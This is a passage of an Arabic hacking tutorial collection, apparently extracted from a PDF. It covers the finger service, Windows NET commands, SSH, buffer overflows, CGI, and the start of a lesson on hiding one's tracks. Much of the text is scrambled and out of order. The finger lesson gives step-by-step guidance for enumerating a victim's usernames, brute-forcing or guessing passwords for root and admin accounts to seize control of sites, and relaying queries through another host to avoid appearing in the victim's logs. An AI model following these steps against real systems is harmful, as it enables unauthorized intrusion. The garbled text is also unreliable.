تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع‬ ‫‪ 1.‬في أغلب الحيان الجابة تخبرك أيضا من الذي يدير النظام)‪ (admin‬وكيف قام‬ ‫بالتصال‪. .com/ 79‬‬ ‫‪58‬‬ .‬بدون أ ّ‬ ‫ن ‪ Finger‬ديمون‪ ،‬مثال عظيم لخدمة‬ ‫لذلك إ ّ‬ ‫ساسة‬ ‫يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الح ّ‬ ‫حول هدف‪.3‬استخدام ‪Finger‬‬ ‫>=================<‬ ‫عند استخدام اي من برامج السكان المعروفة مثل )‪ ( superscan‬للبحث‬ ‫في موقع معين )مثل ‪ ( /http://www. .‬‬ ‫قديما استخدم الناس التصال على جميع انواع النظمة في العالم وطلب الستعلم عن هذه النظمة و الـ‬ ‫‪ Finger‬كان يعطيهم معلومات عن‬ ‫من هم الموجودون في النظام وهل لهم حسابات في هذا النظام‪.

‬‬ ‫اما من يونيكس‬ ‫لسنا بحاجة إلى أن نستعمل تيلنت لنه يوجد بنظام لينوكس زبون)‪(client‬خاص بخدمة ‪Finger‬‬ ‫‪Deamon‬‬ ‫مرّكب على النظام بشكل دائم تقريبا‪...‬‬ ‫أحيانا توجد أعمدة بعنواوين اليميلت وأرقام هواتف ‪.anyname..‬الخ الخاصة بمستخدمين هذا النظام‬ ‫إذا كنت تريد المزيد من المعلومات عن مستخدم معّين )‪ Johnson Peter‬بيتر جونسن‬ ‫‪59‬‬ ..com‬كمثال‬ ‫فستظهرالنتائج‪:‬‬ ‫‪:Login: Name: Tty: Idle: When: Where‬‬ ‫‪root foobar sys console 17d Tue 10:13 node0ls3.> <.com‬‬ ‫لحظ المسافة بين ‪ finger‬و ‪www‬‬ ‫اطبع في محث الوامر في يونكس ) على افتراض انك تستخدم ‪: ( unix shell‬‬ ‫‪finger@foobar.> Amos Amanda‬‬ ‫‪Anderson Kenneth‬‬ ‫‪Bright Adrian‬‬ ‫‪Doe John‬‬ ‫‪<.......‫بعد ذلك سيظهر لك برنامج ‪ telnet‬و منه تطبع الوامر ‪.> Johnson Peter‬‬ ‫‪Mitnick Kevin‬‬ ‫‪Munson Greg‬‬ ‫‪Orwell Dennis‬‬ ‫الن ماذا تعني هذه النتائج؟‬ ‫في العمود الول ) ‪( login‬نرى أسماء المستعملين وفي الثاني )‪" (Name‬السماء الحقيقية"‪،‬‬ ‫التي بالطبع ليست حقيقية‪ ،‬لكن في معظم الوقت حقيقة‪...> <.foobar...com‬‬ ‫لحظ ان الهدف )الموقع المرادالستعلم عنه مثل معرفة من هم مستخدمينه ( هنا هو‬ ‫‪ /http://www.....> <.the idle time‬‬ ‫وبعد ذلك في العمودين الخامس والسادس‬ ‫الوقت والمكان الذي استخدم فيه الحساب للتصال بالنظام‪....com‬‬ ‫ولكن في وندوز سيكون هكذا ‪:‬‬ ‫‪/finger http://www.‬‬ ‫ملحظة ‪ :::‬سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الستمرار بأستخدام‬ ‫وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة الوامر نفسها الوامر التي‬ ‫تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم ‪ "www‬في الوندوز مراعيا اسم الموقع‬ ‫مثل يكون كتابة الوامر في لينوكس هكذا ‪:‬‬ ‫‪finger@anyname......> <..foobar....com‬‬ ‫‪<........‬‬ ‫يرينا العمود الثالث )‪(Tty‬النوع الطرفي ‪the terminal type‬‬ ‫والرابع )‪ (Idle‬فترة التوقف ‪.

‬وبالطبع بعض الحسابات سهلة تخمين كلمة السر ‪.pl‬‬ ‫لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي )‪ word‬او المفكره(‬ ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة‬ ‫استخدم برنامج ‪.Finger‬‬ ‫‪ Finger deamon‬يريك ماهي الحسابات الموجوده على النظام‪.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫> =========================‬ ‫===========<‬ ‫أتمّنى الن شاهدت ما الضعف الرئيسي لخدمة ‪.‬‬ ‫وخاصة حساب الدارة )‪ (Admin‬أو الجذر)‪ (root‬بسبب انه عندما تعرف الباسوورد الخاص بهم‬ ‫وقتها تستطيع التحكم بالموقع ‪ .‬‬ ‫هذا يعني أنك تكسب )عن طريق قانوني ( ‪ % 50‬من المجموعة السحرية وهي‬ ‫كلمات السر‪/‬مجموعة أسماء المستخدمين التي ستمنحك الدخول )‪(Access‬إلى نظام‪.‬‬ ‫اذا‪ ،‬ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو "‪ "temp‬أو "‪"0000‬‬ ‫بدل من "‪ "secret‬وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات‬ ‫سهل معرفة باسوورداته في أغلب الحيان‪.‬‬ ‫هناك بعض الخدع لمعرفة هذا النوع من الحسابات‪ .‬‬ ‫‪finger .com‬‬ ‫عندما ترسل هذا المر الي ‪ Finger Deamon‬سيعطيك جميع الحسابات‬ ‫التي تحتوي على كلمة "‪ "secret‬أّما في اسم المستعمل أو السم الحقيقي‪.bruteforce‬أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة‬ ‫وتجعل البرنامج يعمل عمله‪-‬‬ ‫بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات‪.com‬‬ ‫‪ 1.‬‬ ‫إذا عرفت أسماء المستخدمين‪ ،‬ستكون الخطوة القادمة متوقفه على برنامج ‪ bruteforce‬أو‬ ‫بمعنى آخر برامج تخمين الباسوورد ‪worldist password cracker‬‬ ‫صة كتبت للتيلنت على سبيل المثال‬ ‫هناك سكربتات خا ّ‬ ‫اذهب لموقع ‪ /http://www.@foobar.com‬أو ابحث عن‬ ‫‪VLAD's pwscan.‬على سبيل المثال‬ ‫إطبع المر‪:‬‬ ‫‪finger secret@foobar.‫على سبيل المثال( أدخل المر التالي‪:‬‬ ‫‪finger johnson@foobar.thehackerschoice.com‬‬ ‫جرب هذه الوامر وشاهد ما يحدث!‬ ‫حاول التعرف على ‪ ،Finger Deamon‬أقرأ ‪ RFC‬وأوجد خدعك بنفسك!‬ ‫‪ 1.com‬‬ ‫‪finger 0@foobar.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫> =========================‬ ‫‪60‬‬ .

access‬‬ ‫هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها‬ ‫من معرفتك لهذه الحسابات تستطيع كسر الباسووردات ‪ ،‬بإستعمال تقنية ‪ wordlist‬أو ‪.com‬‬ ‫وأيضا تعرف أن موقع آخر "‪ "www.‬‬ ‫‪ Finger deamon‬قانونيا يزّودك بنصف كلمات السر واسماء المستخدمين‬ ‫التي تحتاجها لكسب الدخول ‪.6‬الستنتاج من هذا الدرس‬ ‫>=======================<‬ ‫‪ Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم لي واحد يحاول‬ ‫كسب الدخول) ‪ ( access‬إلى نظام‪.com‬يقدم خدمة ‪ Finger‬تعمل‪،‬‬ ‫عندها يمكنني ان أقدم طلبا مثل هذا‪):‬اكتب في محث الوامر مثل هذا(‬ ‫‪finger@host.Finger deamon‬‬ ‫انتهى‪،،،‬‬ ‫‪61‬‬ .com‬‬ ‫فعندما تقوم ‪/http://www.bruteforce‬‬ ‫تذّكر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال ‪.host.com‬في سجلتهم‪ ،‬بدل منك ‪.‬‬ ‫فائدة اخرى وهي أنك يمكن ان تترك ‪) Host‬موقع( يقوم ) عن طريق خدمة ‪( Finger‬بالستعلم عن‬ ‫حاسوبا‬ ‫آخرا على نفس الشبكة ‪ ،‬بينما اذا طلبت انت هذا الستعلم بأستخدام خدمة ‪ Finger‬من جهازك‬ ‫لن تكون مسموحة لك لنك سأكون غير موثوق به لدى المستعلم عنه‬ ‫بعكس اذا كان الطلب للستعلم باستخدام ‪ Finger‬عن طريق موقع ‪.‬‬ ‫يعني الخلصة ‪ :‬ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس‬ ‫اذا كان الستعلم عن طريق موقع اخر يشابهه فسوف يسمح له !‪.‫=============<‬ ‫إذا أردت ان استخدم خدمة ‪) Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم"(‬ ‫والستعلم عن موقع معين مثل هذا"‪"www.‬‬ ‫أحدالفوائد من هذه الطريقة انك ستكون مجهول لدى ‪victim.victim.com@victim.com‬‬ ‫بطلب سجل )الدخول ‪ (log‬ستشاهد ‪ /http://www.com‬ويريك النتائج‪.victim.com‬‬ ‫‪ Host.host.com‬يستعلم )‪ (Finger‬الن ‪ victim.‬‬ ‫‪1.

710‬يومًا(‪ ،‬والقيمة الفتراضية هي ‪ 90‬يومًا‪.‬‬ ‫إذا كان اسم الخدمة يحتوي على فراغات‪ ،‬استخدم علمات القتباس حول النص‬ ‫)أي‪ .‬على سبيل المثال‪ ،‬للحصول‬ ‫على تعليمات المر ‪ ،net accounts‬اكتب مايلي‪:‬‬ ‫‪net help accounts‬‬ ‫تقبل كافة أوامر ‪ net‬خيارات سطر الوامر ‪) /y‬نعم( و ‪) /n‬ل(‪ .‬‬ ‫يمكنك الحصول على تعليمات بناء الجملة في سطر الوامر لمر ‪ net‬عن طريق‬ ‫كتابة ‪ net help command‬في موجه الوامر‪ .("Service Name " ،‬على سبيل المثال‪ ،‬يشّغل المر التالي خدمة ‪net‬‬ ‫‪:logon‬‬ ‫"‪net start "net logon‬‬ ‫‪ unlimited‬يكافئ ‪ 49.net‬تملك‬ ‫أوامر ‪ net‬هذه بعض الخصائص المشتركة‪:‬‬ ‫يمكنك مشاهدة قائمة بكافة أوامر ‪ net‬المتوفرة بكتابة ?‪ net /‬في موجه‬ ‫الوامر‪.‬على سبيل‬ ‫المثال‪ ،‬يطالبك المر ‪ net stop server‬بتأكيد رغبتك في إيقاف كافة خدمات‬ ‫الملقم التابعة‪ ،‬بينما يتجاوز ‪ ،net stop server /y‬عن طريق الجابة بنعم‬ ‫تلقائيًا‪ ،‬المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم‪.‬‬ ‫‪62‬‬ .‫" شرح مختصر لدارة الشبكة بإستخدام المر ‪" NET‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫تستخدم العديد من الخدمات أوامر شبكة التصال التي تبدأ بالكلمة ‪ .

‫ن بتسجيل الخروج من شبكة التصال فورًا‪.‬‬ ‫‪63‬‬ .

64 .

‫الوصف‬ ‫لقم‪.‬إن إخراج ‪ net file‬مشابه لمايلي‪:‬‬ ‫‪65‬‬ .‬‬ ‫‪ net file /cl‬لزالة التأمين وإغلق الملف‪ .

‫احد بالعلمة النجمية )*(‪.‬‬ ‫‪66‬‬ .

67 .

‫جال )على سبيل المثال‪.(Sales\Ralphr ،‬‬ ‫‪68‬‬ .

‫انتهى‪،،،‬‬ ‫"شرح الـ ‪"secure shell‬‬ ‫>ةةةةة ةة ةةةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪<ACID BURN_EG :‬‬ ‫السلم عليكم و رحمه ال و بركاته ‪:‬‬ ‫اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على النترنت و‬ ‫هذه الداه هى ال ‪ Secure Shell‬اى ال ‪:: SSh‬‬ ‫‪69‬‬ .

(rcp‬‬ ‫و تقدم ايضا ال ‪ secure shell‬اتصال امن جداا لشحنات اتصالت ال ‪ tcp‬كونيكشن ‪.rsh and‬‬ ‫‪.‫و لنبدأ الن الحديث عنها ‪::‬‬ ‫ما هى ال ‪ SSh‬؟‬ ‫===============‬ ‫ال ‪ secure shell‬هى اداه )برنامج( للتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ‬ ‫اوامر او مهام معينه داخل هذا الجهاز اى و هو التصال عن بعد ‪ remotely connection‬و تستخدم‬ ‫ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات التصال الغير‬ ‫امنه و هى تعتبر كبديل جيد جداا لدوات تستعمل لنفس الغرض فى يونكس مثل )‪rlogin.rsh and rcp‬الى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت‬ ‫اكسيس )‪ (root access‬للجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى‬ ‫ريموتلى يمكنه ان يدخل الى كل بيانات الجهزه التى على الشبكه بدون ادنى صعوبه لنه يستطيع بالروت‬ ‫اكسس ان يعبر من خلل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و‬ ‫هذا ما يسمى بأن الشخص لديه ‪ unauthorized access to systems‬اعتقد انكم فهمتونى الن و‬ ‫يمكن ايضا لى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلل شبكتك و تكون هذه‬ ‫الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك‬ ‫ملحوظه‪ :‬طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الختراق و تستخدم فى اختراق المنظمات‬ ‫الكبرى و تقع تحت بند تقفى الثر و العداد للختراق (‬ ‫و الن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الدوات فى يونكس فالسيكيور‬ ‫شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ل يعطيه الحق للدخول‬ ‫الى بيانات اجهزه الشبكه ال بالباسورد و ل يمكن التحايل على ال ‪ ssh‬فى هذه النقطه و بذلك حتى لو تمكن‬ ‫الشخص من اكتساب الروت اكسس لن يستطسع الطلع على بيانات الشبكه‬ ‫ال ب ‪.commands‬مثل )‬ ‫‪ (rlogin. authorized access to systems‬‬ ‫و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط‬ ‫الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لن السيكيور شيل ل يرسل الباسوردات فى‬ ‫صوره واضحه كما ترسلها ادوات يونكس الخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق‬ ‫محاوله فك الشفره و الخ‬ ‫و لكن مع كل هذه المزايا لم يخلى ال ‪ secure shell‬من الثغرات و لكن تعتبر ثغراته قليل و تقريبا‬ ‫معظمها يحتاج الى الرووت اكسس و الخرى يمكن ان تخترق السيكيور شل فقط بها )هذا كلم بينى و بينكم(‬ ‫و الن سؤال اخر ‪::‬‬ ‫ما هى انواع الهجوم التى تحمى منها ال ‪ ssh‬؟‬ ‫‪70‬‬ .commands‬فى‬ ‫يونكس ==================================================‬ ‫======================================‬ ‫كالمذكورين فى العلى ؟‬ ‫======================‬ ‫فى توزيعات اليونكس مثل ال *‪ BSD‬تتعرض الدوات التى يطلق عليها ‪ r.‬‬ ‫و هنا يأتى سؤال مهم ‪ ::‬و السؤال هو ‪::‬‬ ‫لماذا يفضل استخدام ال ‪ secure shell‬على الدوات الخرى التى يطلق عليها ‪ r.

.‬‬ ‫اذن فهى اداه حقا مميزه و تستحق الحترام و الهتمام مع انها ل تخلو من الثغرات و لكن لنجعلها افضل ما‬ ‫موجود فى هذا المجال‬ ‫ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن‬ ‫ظنكم‪. localy‬‬ ‫‪ -2‬تحمى مما يسمى ال ‪DNS spoofing‬‬ ‫‪ -3‬تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس‬ ‫‪ -4‬تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لى داتا مخزنه‬ ‫و لكن مع كل هذا فأن ال ‪ ssh‬ليس امن بدرجه كبيره حيث ان الشخاص ذو خبره كبيره فى النت ورك‬ ‫يستطيعون ان يجعلون ال ‪ ssh‬ينقطع عن التصال اى ‪ disconnected‬و لكن ل يمكن ان يكسرو تشفير‬ ‫بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها ‪. DES. Buffer Overflows‬وانشال تستفيدون منه‬ ‫يله نبدأ‬ ‫‪71‬‬ . Blowfish‬يمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الداه تسمح لك بعدم‬ ‫تشغيل التشفير اى" ‪ encryption of type "none‬و بهذا تجعلنى اقول عليك احمق ! لن هذا يجعل‬ ‫ال ‪ ssh‬سهله الختراق مثل الدوات التى تم ذكرها فى اول الموضوع فى يونكس ‪ .‬‬ ‫‪ (TSS.‬حيث ان هذا التشفير‬ ‫ايضا يمنع ال ‪ ip spoofing‬و ال ‪ DNS spoofing‬و هذا ايضا بالضافه الى تغيير مفاتيح فك التشفير‬ ‫كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما ‪.‫===========================================‬ ‫‪ -1‬تحمى من ال ‪ ip spoofing‬اى تحمى من انتحال عنواين الى بى حيث انه لو ارسل شخص ما‬ ‫باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال ‪ ssh‬و تحمى ايضا‬ ‫ال ‪ ssh‬من المنتحلين على الشبكه المحليه اى ‪.‬‬ ‫و ايضا كل الشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها‬ ‫ال ‪ ssh‬و هى تسمح بأكثر من نوع تشفير مثل )‪three-key triple-DES.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح معنى الـ ‪"Buffer Overflows‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫اقدم لكم درس يشرح ما معنى الـ ‪ . RC4-128.

‬‬ ‫المشكلة هنا تكمن في انه إذا كان المتغّير مخصص لتخزين بيانات حجمها القصى يساوي ‪ 15‬بايت والبيانات‬ ‫هنا)وهي اسم المستخدم(حجمها ‪ 25‬بايت التي ستخزن في المتغير )يتضح لنا ان اسم المستخدم وضع في‬ ‫مكان اقل من حجمه (‪.MS web server-‬‬ ‫عموما‪ ،‬يحدث ‪ Buffer Overflow‬عندما يظهر برنامج ما متغّير بحجم ثابت )على سبيل المثال‪،‬حجم ‪20‬‬ ‫صصت إلى هذه المتغّير أكبر من حجم المتغّير‪.‬‬ ‫اذن ماذا سيحدث للبيانات الزائدة عن ‪ 15‬بايت من المؤكد انها سـ"تطفح ‪ "Overflow‬على الذاكرة التي‬ ‫صصت لمتغّير السم‪.‫محتويات الدرس‪:‬‬ ‫‪ -1‬ما هو الـ ‪ Buffer Overflow‬؟‬ ‫<‪--------------------------‬‬ ‫‪ -2‬المعالجه)‪(Proccess‬‬ ‫<‪-----------------‬‬ ‫‪ -3‬إدارة الذاكره )‪(Memory management‬‬ ‫<‪--------------------------------‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪----------------------------------‬‬ ‫* ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟‬ ‫ليس الكثير‪ ،،،‬فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب‬ ‫وإدارة الذاكرة‬ ‫‪-1‬ما هو الـ ‪Buffer Overflow‬؟‬ ‫<‪>-----------------------‬‬ ‫‪ Buffer Overflow‬حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء‪.‬‬ ‫احدث ثغرة يمكنك أستغللها من نوع ‪ Buffer Overflow‬تسمى فايروس '‪ ، 'code red‬التي أستغلت‬ ‫في خادم ‪ IIS‬لمايكروسوفت ‪.‬‬ ‫بايت( و القيمة التي خ ّ‬ ‫خذ هذا المثال‪:‬‬ ‫يظهر برنامجي على الشاشة هذه الجملة‪" :‬رجاء إطبع اسمك الول‪" :‬ثم سيأخذ برنامجي من المستخدم‬ ‫البيانات التي سيدخلها وهي )اسمه الول( ثم توضع في متغير فتظهر في برنامجي او تخزن‪.‬‬ ‫خ ّ‬ ‫صص الذاكرة ‪:‬‬ ‫عندما يبدأ البرنامج‪ ،‬تخ ّ‬ ‫>‪<var1><var2><vname><Other things in memory‬‬ ‫‪10b 6b 15b‬‬ ‫)‪ var 1‬و ‪ var 2‬متغّيرات ليست لها علقة بالسم المدخل ‪ vname.‬المتغّير الذي حجمه ‪ 15‬بايت‬ ‫وهو الذي سيحتوي السم الذي سيدخله المستخدم(‬ ‫نفترض ان المستخدم سيدخل السم " ‪abcabcabcabcabcabcabcabca‬‬ ‫‪ "bc‬حينها ستبدو الذاكره هكذا‪:‬‬ ‫‪somevalue2avalusabcabcabc‬‬ ‫‪abcabcabcabcabcabc‬‬ ‫>‪<var1 ><var2><vname ><other things go here‬‬ ‫اذا ماذا حدث ؟؟ المتغّير ‪" vname‬طفح ‪ "overflowed‬بسبب البيانات المدخلة عليه من قبل المستخدم‬ ‫‪72‬‬ .

‬‬ ‫العنوان التخيل ّ‬ ‫و هنالك استخدام اخر للذاكرة الفتراضية)التخيلّية( وهي انه من المعلوم أن الذاكرة الحقيقية ل ترتبط مباشرة‬ ‫بكل عملية )أو برنامج(‪ ،‬فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة‪،‬‬ ‫والتطبيق ل يمكنه أبدا معرفة مكان الذاكرة ) مكان الذاكرة الحقيقة (‪،‬ذلك لن المساحة المخصصة للذاكرة في‬ ‫القرص الصلب تتبدل وتتغير‪.‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪>---------------------------------‬‬ ‫الن نصل إلى الجزء الهم والمرح‬ ‫‪73‬‬ .:‬ان الذاكرة ل تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد‬ ‫اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ‪ ،‬حيث ان الذاكرة الحقيقة تمثل‬ ‫مساحة معينة من القرص الصلب )ومكان هذه المساحة في تغير مستمر( لذلك سميت حقيقية او بمعنى اخر‬ ‫طبيعية )اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب(‬ ‫وفائدة الذاكرة الفتراضية هي إعطاء عنوان افتراضي )غير حقيقي ( للذاكرة الحقيقية اي يعطي عنوان كأسم‬ ‫فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ‪ ،‬وإن تغير مكان المساحة المخصصة للذاكرة يظل‬ ‫العنوان الفتراضي)التخيلي( ثابت‪.‬‬ ‫وعندما تقوم ذاكرة الـ ‪) OS‬نظام التشغيل(بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ‪،‬يأخذ البرنامج‬ ‫ي فقط ‪ ،‬وليس العنوان الطبيعي‪.‬‬ ‫‪-2‬المعالجه)‪:(Proccess‬‬ ‫<‪>----------------‬‬ ‫ن الوحدة الوظيفية الساسية في حاسوب يعمل هي عملية المعالجه )‪...‫و قيمة "‪ other things in memory‬أشياء اخرى في الذاكره" تغّيرت بسبب فيض)‪(overflow‬‬ ‫الحروف من ادخال المستخدم‪.‬‬ ‫ن وحدة المعالجة‬ ‫ليس هناك شيء إسمه "متعددالعمليات ‪ "Multi.‬‬ ‫وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو‪:‬‬ ‫‪-3‬إدارة الذاكره )‪:(Memory management‬‬ ‫<‪>------------------------------‬‬ ‫تدير أنظمة التشغيل‪-operating systems-‬الحديثة ذاكرة افتراضية ‪)virtual memory‬تخيلية(‪.‬‬ ‫توضيح ‪ .‬لماذا؟؟‬ ‫انظمة التشغيل ‪ Operating System‬تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الى‬ ‫عناوين افتراضية)تخيلية(" ‪.(Proccess‬في الحاسوب هنالك‬ ‫إّ‬ ‫العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القّوة التي تجعل العديد من العمليات تعمل في نفس‬ ‫الوقت في الحاسوب‪.proccesses‬صحيح‪ .‬كيف اذن؟؛ ا ّ‬ ‫المركزية)‪ (CPU‬تنتقل بين العمليات كُل على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعمل‬ ‫في وقت واحد‪،‬‬ ‫اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا ‪.‬‬ ‫اذن كيف أستغّل هذا الخطأ؟؟؟‬ ‫قبل أن نصل إلى الجواب‪ ،‬هناك بعض الشياء الساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية‬ ‫الحاسوب ‪. (:‬‬ ‫كّل عملية لها عنوان فاضي من الذاكره ‪ ،‬وليمكن لي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة‪..‬‬ ‫ذلك يعني بأّنه ليمكن لي تطبيق )برنامج مثل( الوصول مباشرة إلى الذاكرة الحقيقية‪.‬‬ ‫في هذه المقالة سنناقش نظام لينكس ‪ ،linux‬لكن المفهوم مماثل لباقي النظمة‪.

‫كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر )‪ (Root‬وأختراق‬ ‫النظام؟ تذّكر نحن قلنا في وقت سابق بأّنه عندما يكون الدخال)البيانات( من المستخدم أكبر حجما من الذاكرة‬ ‫صصت لهذه البيانات‪ ،‬البيانات الزائدة ستفيض )‪ (overflow‬في الذاكرة التي بعد السم المتغّير؟ هذا‬ ‫التي خ ّ‬ ‫المكان من الذاكرة هو المكان الذي نستفيد منه في الختراق‪.‬القيام بهذا‬ ‫العمل ليس بيسطا كما يبدو لك‪ ،‬إذن لو أردت معرفة كيف يعمل ‪ ،‬أنت يجب أن تقرأ المقالة القادمة حول‬ ‫‪ ،Buffer Overflows‬الذي سيصف بالضبط كيف لستغلل واحده من الـ ‪ Buffer Overflows‬في‬ ‫الختراق‪.‬‬ ‫ماذا نعمل في ذلك المكان‪ :‬داخل خط )مكان( البيانات التي يدخلها المستخدم )في المثال السابق وهو السم‬ ‫الول الذي يطلب من قبل البرنامج ثم أدخلناه ( نضع الوامر الكثر شعبية للحاسوب‪ ،‬حيث هذه الوامر تجعل‬ ‫الحاسوب يحدث)ينتج( هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغّل‪ .‬‬ ‫اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى ‪ Buffer Overflow‬واللي فهم الدرس نص‬ ‫نص يعيد قرائته اكثر من مرة مع التدقيق وانشال يفهم‪.‬‬ ‫انتهى‪،،،‬‬ ‫" الـ ‪ CGI‬وعلقتها بالنترنت "‬ ‫>ةةةةة<‬ ‫>ةةةةة ةة ةةة‪<King_abdo :‬‬ ‫في هذا الملف سوف نقوم بعرض مقدمة الـ ‪ CGI‬و علقتها بالنترنت‬ ‫‪74‬‬ .

‫)‪ (1‬مقدمة للـ ‪CGI‬‬ ‫‪ CGI=COMMON GATEWAY INTERFACE‬هي الواجهة التي تسمح بالتصال بين جانب‬ ‫المستخدم عن طريق المتصفح أو البرامج‬ ‫و خلفه و جانب الويب سيرفر الذي يفهم بروتوكول )‪(HTTP‬‬ ‫الـ ‪ TCP/IP‬هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء التصال ‪ .‬البورت‬ ‫المحددة‬ ‫لهذا البروتوكول هي ‪ ) 80‬من الممكن أن تتغير هذه البورت(‬ ‫تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلت‬ ‫معينه يقوم‬ ‫مبرمج السي جي أي بتحديدها‬ ‫يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين ‪:‬‬ ‫‪ -1‬في الخطوة الولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له‬ ‫‪ -2‬في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس‬ ‫يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل‬ ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك‬ ‫أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج‬ ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير‬ ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‬ ‫‪75‬‬ .

.TELNET‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تحمي نفسك وتخفي أفعالك؟!"‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مقدمه بسيطه ‪:‬‬ ‫==========‬ ‫في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او املئيه ‪ .‬كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ ‪ FTP‬أو ‪..‬كل ما اسعى له هو تعميم‬ ‫الفائده على الجميع‬ ‫و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها ‪..‬ارجو ان تكون صبورا متانيا حتى اخر الموضوع‬ ‫‪76‬‬ .‫أهم الوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي ‪:‬‬ ‫‪ GET -1‬هذا المر يقوم بطلب بيانات من السيرفر للمتصفح‬ ‫‪ POST -2‬هذا المر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح‬ ‫‪ PUT 